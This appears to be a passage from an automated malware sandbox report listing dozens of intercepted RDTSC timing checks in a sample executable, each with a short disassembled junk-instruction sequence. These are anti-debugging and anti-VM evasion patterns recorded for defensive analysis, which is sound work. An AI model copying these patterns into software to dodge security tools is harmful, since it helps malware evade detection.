                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C88C4D second address: C88C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0550D663C6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C1BC85 second address: C1BC8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C88358 second address: C8835D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C884DC second address: C884E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C884E0 second address: C884E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C9265A second address: C92662 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C9A9E5 second address: C9AA40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663D2h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F0550D663C8h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007F0550D663D6h 0x00000019 jnl 00007F0550D663C6h 0x0000001f jmp 00007F0550D663D5h 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jno 00007F0550D663C6h 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C9AA40 second address: C9AA44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6B4F3 second address: C6B50A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0550D663C6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jp 00007F0550D663D4h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6B50A second address: C6B50E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6C230 second address: C6C28F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F0550D663CAh 0x0000000c nop 0x0000000d mov cx, di 0x00000010 push 0000001Eh 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F0550D663C8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c and edi, dword ptr [ebp+1247CF85h] 0x00000032 nop 0x00000033 push ebx 0x00000034 jmp 00007F0550D663D6h 0x00000039 pop ebx 0x0000003a push eax 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jbe 00007F0550D663C6h 0x00000044 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6C587 second address: C6C5BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F0550733D0Fh 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 push ebx 0x00000017 jmp 00007F0550733D11h 0x0000001c pop ebx 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6C5BD second address: C6C5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0550D663D4h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6C5DE second address: C6C5E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C99EE7 second address: C99EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C99EF4 second address: C99EF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C9A05C second address: C9A060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C9A5CF second address: C9A5F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C9A5F1 second address: C9A5FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F0550D663C6h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA264B second address: CA265C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F0550733D08h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA1180 second address: CA1184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA1184 second address: CA1188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA1188 second address: CA119A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F0550D663C6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA119A second address: CA11B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D0Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA11B2 second address: CA11C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0550D663C6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA11C1 second address: CA11C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA11C5 second address: CA11CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA19CE second address: CA19D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA1E07 second address: CA1E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0550D663CCh 0x00000009 popad 0x0000000a jbe 00007F0550D663CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA1E20 second address: CA1E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F0550733D12h 0x0000000d jne 00007F0550733D06h 0x00000013 je 00007F0550733D06h 0x00000019 pushad 0x0000001a jmp 00007F0550733D10h 0x0000001f push edx 0x00000020 pop edx 0x00000021 popad 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA0E48 second address: CA0E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0550D663C6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA0E56 second address: CA0E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0550733D06h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F0550733D12h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA0E7D second address: CA0E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA8065 second address: CA8069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA8069 second address: CA8079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0550D663C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA6D61 second address: CA6D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0550733D06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA6D6D second address: CA6D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0550D663D3h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA6D89 second address: CA6D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA6EFB second address: CA6F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA6F02 second address: CA6F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F0550733D06h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA6F0E second address: CA6F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA6F12 second address: CA6F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA6F22 second address: CA6F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0550D663D0h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA6F3B second address: CA6F4F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0550733D06h 0x00000008 je 00007F0550733D06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA7389 second address: CA7394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0550D663C6h 0x0000000a pop ebx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA7394 second address: CA739D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA739D second address: CA73CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F0550D663DCh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007F0550D663D4h 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F0550D663C6h 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA7514 second address: CA751A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA751A second address: CA753F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F0550D663D5h 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA753F second address: CA7543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA7DD9 second address: CA7DE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CA7DE8 second address: CA7DED instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CAAB9F second address: CAABA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CAABA5 second address: CAABEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D18h 0x00000007 pushad 0x00000008 jo 00007F0550733D06h 0x0000000e jmp 00007F0550733D18h 0x00000013 jmp 00007F0550733D0Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CACFB2 second address: CACFB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CACFB6 second address: CACFD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F0550733D14h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CACFD9 second address: CACFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0550D663D4h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CACB13 second address: CACB17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CACB17 second address: CACB1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CACC65 second address: CACC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0550733D06h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CACC6F second address: CACC89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663D0h 0x00000007 jnc 00007F0550D663C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CAF88E second address: CAF894 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CAF894 second address: CAF89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CAF89A second address: CAF89E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CAF9F4 second address: CAF9FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CAFBD3 second address: CAFBEB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0550733D06h 0x00000008 jmp 00007F0550733D0Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CAFBEB second address: CAFBF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB55FE second address: CB560A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0550733D06h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB5849 second address: CB584F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB584F second address: CB5853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB5853 second address: CB5863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0550D663CAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB5863 second address: CB5868 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB5868 second address: CB5870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB5B76 second address: CB5B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0550733D0Dh 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB993F second address: CB9945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB9945 second address: CB994B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C20DA4 second address: C20DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C20DA8 second address: C20DAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB9033 second address: CB9049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F0550D663C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB9049 second address: CB904E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB904E second address: CB905A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F0550D663C6h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB91B0 second address: CB91B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB91B6 second address: CB91BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB91BA second address: CB91CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F0550733D06h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB91CA second address: CB91D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB91D0 second address: CB91F0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0550733D0Ch 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push edi 0x00000012 jng 00007F0550733D06h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB942F second address: CB9437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CB9556 second address: CB9567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CBE483 second address: CBE493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jno 00007F0550D663C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CBE602 second address: CBE61C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D15h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CC08AD second address: CC08C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F0550D663D1h 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CC5AED second address: CC5AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CC5AF3 second address: CC5AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
